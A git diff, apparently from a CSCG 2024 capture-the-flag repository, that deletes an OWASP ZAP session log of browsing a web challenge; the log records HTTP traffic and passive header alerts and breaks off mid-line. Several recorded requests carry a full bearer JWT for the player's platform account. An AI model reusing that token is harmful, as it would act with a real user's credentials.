diff --git a/cscg24/rev/intro_rev_2/rev2.bndb b/cscg24/rev/intro_rev_2/rev2.bndb new file mode 100644 index 0000000..cdd6ffb Binary files /dev/null and b/cscg24/rev/intro_rev_2/rev2.bndb differ diff --git a/cscg24/web/intro_web_2/intro_web_2_session.session.data b/cscg24/web/intro_web_2/intro_web_2_session.session.data index df5ae5c..4353e66 100644 Binary files a/cscg24/web/intro_web_2/intro_web_2_session.session.data and b/cscg24/web/intro_web_2/intro_web_2_session.session.data differ diff --git a/cscg24/web/intro_web_2/intro_web_2_session.session.lck b/cscg24/web/intro_web_2/intro_web_2_session.session.lck deleted file mode 100644 index 4dbe9e2..0000000 Binary files a/cscg24/web/intro_web_2/intro_web_2_session.session.lck and /dev/null differ diff --git a/cscg24/web/intro_web_2/intro_web_2_session.session.lobs b/cscg24/web/intro_web_2/intro_web_2_session.session.lobs index e50f791..63e2f10 100644 Binary files a/cscg24/web/intro_web_2/intro_web_2_session.session.lobs and b/cscg24/web/intro_web_2/intro_web_2_session.session.lobs differ diff --git a/cscg24/web/intro_web_2/intro_web_2_session.session.log b/cscg24/web/intro_web_2/intro_web_2_session.session.log deleted file mode 100644 index edd1eb7..0000000 --- a/cscg24/web/intro_web_2/intro_web_2_session.session.log +++ /dev/null @@ -1,2903 +0,0 @@ -/*C2*/SET SCHEMA PUBLIC -SET FILES LOG TRUE -/*C4*/SET SCHEMA PUBLIC -DELETE FROM SESSION WHERE SESSIONID=1709346750724 -INSERT INTO SESSION VALUES(1709346750724,'Untitled Session','2024-03-02 03:32:43.041776') -COMMIT -/*C3*/SET SCHEMA PUBLIC -INSERT INTO HISTORY VALUES(1,1709346750724,1,200,1709346894944,457,'POST','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','POST https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000acontent-type: application/grpc-web+proto\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aContent-Length: 44\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','00000000270a18373232653363613365393262363863656666353830336664120b696e74726f2d7765622d32','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAccess-Control-Expose-Headers: Access-Control-Allow-Origin, Vary, Date, Content-Type, grpc-status, grpc-message\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Type: application/grpc-web+proto\u000d\u000aServer: Caddy\u000d\u000aVary: Origin\u000d\u000aDate: Sat, 02 Mar 2024 02:34:55 GMT\u000d\u000acontent-length: 129\u000d\u000a\u000d\u000a','00000000670a1837323265336361336539326236386365666635383033666410011a49123d3732326533636133653932623638636566663538303366642d313032342d696e74726f2d7765622d322e6368616c6c656e67652e637363672e6c69766518b90a220568747470738000000010677270632d7374617475733a20300d0a',NULL,'',TRUE) -COMMIT -INSERT INTO HISTORY VALUES(2,1709346750724,0,0,0,0,'GET','https://api.cscg.live:444','GET https://api.cscg.live:444 HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','','','',NULL,'',FALSE) -COMMIT -INSERT INTO HISTORY VALUES(3,1709346750724,0,0,0,0,'GET','https://api.cscg.live:444/platform.Platform','GET https://api.cscg.live:444/platform.Platform HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','','','',NULL,'',FALSE) -COMMIT -/*C10*/SET SCHEMA PUBLIC -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',1,'','https://play.cscg.live') -COMMIT -INSERT INTO PARAM VALUES(2,'api.cscg.live:444','header','Access-Control-Expose-Headers',1,'','Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message') -COMMIT -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',1,'','h3=":443"; ma=2592000') -COMMIT -INSERT INTO PARAM VALUES(4,'api.cscg.live:444','header','Content-Type',1,'','application/grpc-web+proto') -COMMIT -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',1,'','Caddy') -COMMIT -INSERT INTO PARAM VALUES(6,'api.cscg.live:444','header','Vary',1,'','Origin') -COMMIT -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',1,'','Sat%2C 02 Mar 2024 02:34:55 GMT') -COMMIT -INSERT INTO PARAM VALUES(8,'api.cscg.live:444','header','content-length',1,'','129') -COMMIT -/*C5*/SET SCHEMA PUBLIC -INSERT INTO ALERT VALUES(0,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',1,1,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/SET SCHEMA PUBLIC -INSERT INTO ALERT_TAG VALUES(1,0,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(2,0,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(1,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',1,1,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(3,1,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(4,1,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(4,1709346750724,1,403,1709346896051,237,'GET','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html','GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html HTTP/1.1\u000d\u000ahost: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aConnection: keep-alive\u000d\u000aReferer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/\u000d\u000aUpgrade-Insecure-Requests: 1\u000d\u000aSec-Fetch-Dest: document\u000d\u000aSec-Fetch-Mode: navigate\u000d\u000aSec-Fetch-Site: same-origin\u000d\u000aSec-Fetch-User: ?1\u000d\u000a\u000d\u000a','','HTTP/1.1 403 Forbidden\u000d\u000aServer: nginx/1.24.0\u000d\u000aDate: Sat, 02 Mar 2024 02:34:56 GMT\u000d\u000aContent-Type: text/html\u000d\u000aContent-Length: 384\u000d\u000aConnection: keep-alive\u000d\u000aETag: "1-180"\u000d\u000a\u000d\u000a','3c68746d6c3e0a3c686561643e0a202020203c7469746c653e496e74726f20746f2057656220323c2f7469746c653e0a202020203c6d65746120636861727365743d225554462d38223e0a202020203c6c696e6b2072656c3d227374796c6573686565742220747970653d22746578742f6373732220687265663d227374796c652e63737322202f3e0a3c2f686561643e0a3c626f64793e0a3c68313e24284745524d414e5f4349545929205472616d205469636b6574204d616368696e653c2f68313e0a0a3c68333e3c7370616e207374796c653d22636f6c6f723a20726564223e496e736563757265206f7065726174696e672073797374656d213c2f7370616e3e3c2f68333e0a3c68723e0a466f7220734563557249745920724561536f4e732c20796f75206e65656420746f2075706461746520796f75722073797374656d20746f2057696e646f7773203935206265666f726520616363657373696e6720746869732077656273697465210a3c2f626f64793e0a3c2f68746d6c3e',NULL,'',TRUE) -COMMIT -INSERT INTO HISTORY VALUES(5,1709346750724,0,0,0,0,'GET','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337 HTTP/1.1\u000d\u000ahost: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aConnection: keep-alive\u000d\u000aReferer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/\u000d\u000aUpgrade-Insecure-Requests: 1\u000d\u000aSec-Fetch-Dest: document\u000d\u000aSec-Fetch-Mode: navigate\u000d\u000aSec-Fetch-Site: same-origin\u000d\u000aSec-Fetch-User: ?1\u000d\u000a\u000d\u000a','','','',NULL,'',FALSE) -COMMIT -INSERT INTO HISTORY VALUES(6,1709346750724,1,200,1709346896338,23,'GET','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/style.css','GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/style.css HTTP/1.1\u000d\u000ahost: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: text/css,*/*;q=0.1\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aConnection: keep-alive\u000d\u000aReferer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html\u000d\u000aSec-Fetch-Dest: style\u000d\u000aSec-Fetch-Mode: no-cors\u000d\u000aSec-Fetch-Site: same-origin\u000d\u000a\u000d\u000a','','HTTP/1.1 200 OK\u000d\u000aServer: nginx/1.24.0\u000d\u000aDate: Sat, 02 Mar 2024 02:34:56 GMT\u000d\u000aContent-Type: text/plain\u000d\u000aContent-Length: 287\u000d\u000aLast-Modified: Thu, 01 Jan 1970 00:00:01 GMT\u000d\u000aConnection: keep-alive\u000d\u000aETag: "1-11f"\u000d\u000aCache-Control: no-store\u000d\u000aAccept-Ranges: bytes\u000d\u000a\u000d\u000a','68746d6c207b0a202020206d61782d77696474683a20373063683b0a2020202070616464696e673a2033656d2031656d3b0a202020206d617267696e3a206175746f3b0a202020206c696e652d6865696768743a20312e37353b0a20202020666f6e742d73697a653a20312e3235656d3b0a0a202020206261636b67726f756e642d636f6c6f723a20233145323132323b0a20202020636f6c6f723a20234244423741463b0a7d0a68312c2068322c206833207b0a20202020636f6c6f723a20234538453645333b0a7d0a6872207b0a202020206d617267696e2d746f703a202d31656d3b0a7d0a61207b0a20202020636f6c6f723a206c69676874626c75653b0a20202020746578742d6465636f726174696f6e3a206e6f6e653b0a7d0a',NULL,'',TRUE) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(2,0,10036,'Server Leaks Version Information via "Server" HTTP Response Header Field',1,3,'The web/application server is leaking version information via the "Server" HTTP response header. Access to such information may facilitate attackers identifying other vulnerabilities your web/application server is subject to.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/style.css','','','Ensure that your web server, application server, load balancer, etc. is configured to suppress the "Server" header or provide generic details.','https://httpd.apache.org/docs/current/mod/core.html#servertokens\u000ahttps://learn.microsoft.com/en-us/previous-versions/msp-n-p/ff648552(v=pandp.10)\u000ahttps://www.troyhunt.com/shhh-dont-let-your-response-headers/',6,6,'','nginx/1.24.0',200,13,3,'','10036') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(5,2,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(6,2,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -INSERT INTO ALERT_TAG VALUES(7,2,'WSTG-v42-INFO-02','https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/01-Information_Gathering/02-Fingerprint_Web_Server') -COMMIT -/*C10*/INSERT INTO PARAM VALUES(9,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Server',1,'','nginx/1.24.0') -COMMIT -INSERT INTO PARAM VALUES(10,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Date',1,'','Sat%2C 02 Mar 2024 02:34:56 GMT') -COMMIT -INSERT INTO PARAM VALUES(11,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Content-Type',1,'','text/html') -COMMIT -INSERT INTO PARAM VALUES(12,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Content-Length',1,'','384') -COMMIT -INSERT INTO PARAM VALUES(13,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Connection',1,'','keep-alive') -COMMIT -INSERT INTO PARAM VALUES(14,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','ETag',1,'','"1-180"') -COMMIT -DELETE FROM PARAM WHERE PARAMID=9 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Server' AND USED=1 AND FLAGS='' AND VALS='nginx/1.24.0' -INSERT INTO PARAM VALUES(9,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Server',2,'','nginx/1.24.0') -COMMIT -DELETE FROM PARAM WHERE PARAMID=10 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Date' AND USED=1 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT' -INSERT INTO PARAM VALUES(10,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Date',2,'','Sat%2C 02 Mar 2024 02:34:56 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=11 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Content-Type' AND USED=1 AND FLAGS='' AND VALS='text/html' -INSERT INTO PARAM VALUES(11,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Content-Type',2,'','text/html,text/plain') -COMMIT -DELETE FROM PARAM WHERE PARAMID=12 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Content-Length' AND USED=1 AND FLAGS='' AND VALS='384' -INSERT INTO PARAM VALUES(12,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Content-Length',2,'','287,384') -COMMIT -INSERT INTO PARAM VALUES(15,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Last-Modified',1,'','Thu%2C 01 Jan 1970 00:00:01 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=13 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Connection' AND USED=1 AND FLAGS='' AND VALS='keep-alive' -INSERT INTO PARAM VALUES(13,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Connection',2,'','keep-alive') -COMMIT -DELETE FROM PARAM WHERE PARAMID=14 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='ETag' AND USED=1 AND FLAGS='' AND VALS='"1-180"' -INSERT INTO PARAM VALUES(14,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','ETag',2,'','"1-180","1-11f"') -COMMIT -INSERT INTO PARAM VALUES(16,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Cache-Control',1,'','no-store') -COMMIT -INSERT INTO PARAM VALUES(17,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Accept-Ranges',1,'','bytes') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(3,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/style.css','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',6,6,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(8,3,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(9,3,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(4,0,10038,'Content Security Policy (CSP) Header Not Set',2,3,'Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page \u2014 covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html','','','Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header.','https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy\u000ahttps://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html\u000ahttps://www.w3.org/TR/CSP/\u000ahttps://w3c.github.io/webappsec-csp/\u000ahttps://web.dev/articles/csp\u000ahttps://caniuse.com/#feat=contentsecuritypolicy\u000ahttps://content-security-policy.com/',4,4,'','',693,15,3,'','10038-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(10,4,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(11,4,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(5,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/style.css','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',6,6,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(12,5,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(13,5,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(6,0,10036,'Server Leaks Version Information via "Server" HTTP Response Header Field',1,3,'The web/application server is leaking version information via the "Server" HTTP response header. Access to such information may facilitate attackers identifying other vulnerabilities your web/application server is subject to.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html','','','Ensure that your web server, application server, load balancer, etc. is configured to suppress the "Server" header or provide generic details.','https://httpd.apache.org/docs/current/mod/core.html#servertokens\u000ahttps://learn.microsoft.com/en-us/previous-versions/msp-n-p/ff648552(v=pandp.10)\u000ahttps://www.troyhunt.com/shhh-dont-let-your-response-headers/',4,4,'','nginx/1.24.0',200,13,3,'','10036') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(14,6,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(15,6,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -INSERT INTO ALERT_TAG VALUES(16,6,'WSTG-v42-INFO-02','https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/01-Information_Gathering/02-Fingerprint_Web_Server') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(7,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',4,4,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(17,7,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(18,7,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(7,1709346750724,1,200,1709346896616,130,'OPTIONS','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','OPTIONS https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aAccess-Control-Request-Method: POST\u000d\u000aAccess-Control-Request-Headers: authorization,content-type,x-grpc-web,x-user-agent\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Headers: content-type,accept,x-user-agent,x-grpc-web,grpc-status,grpc-message,authorization\u000d\u000aAccess-Control-Allow-Methods: GET,HEAD,POST,PUT,DELETE\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Length: 0\u000d\u000aDate: Sat, 02 Mar 2024 02:34:56 GMT\u000d\u000aServer: Caddy\u000d\u000a\u000d\u000a','',NULL,'',TRUE) -COMMIT -/*C10*/INSERT INTO PARAM VALUES(18,'api.cscg.live:444','header','Access-Control-Allow-Headers',1,'','content-type%2Caccept%2Cx-user-agent%2Cx-grpc-web%2Cgrpc-status%2Cgrpc-message%2Cauthorization') -COMMIT -INSERT INTO PARAM VALUES(19,'api.cscg.live:444','header','Access-Control-Allow-Methods',1,'','GET%2CHEAD%2CPOST%2CPUT%2CDELETE') -COMMIT -DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=1 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',2,'','https://play.cscg.live') -COMMIT -DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=1 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',2,'','h3=":443"; ma=2592000') -COMMIT -INSERT INTO PARAM VALUES(20,'api.cscg.live:444','header','Content-Length',1,'','0') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND 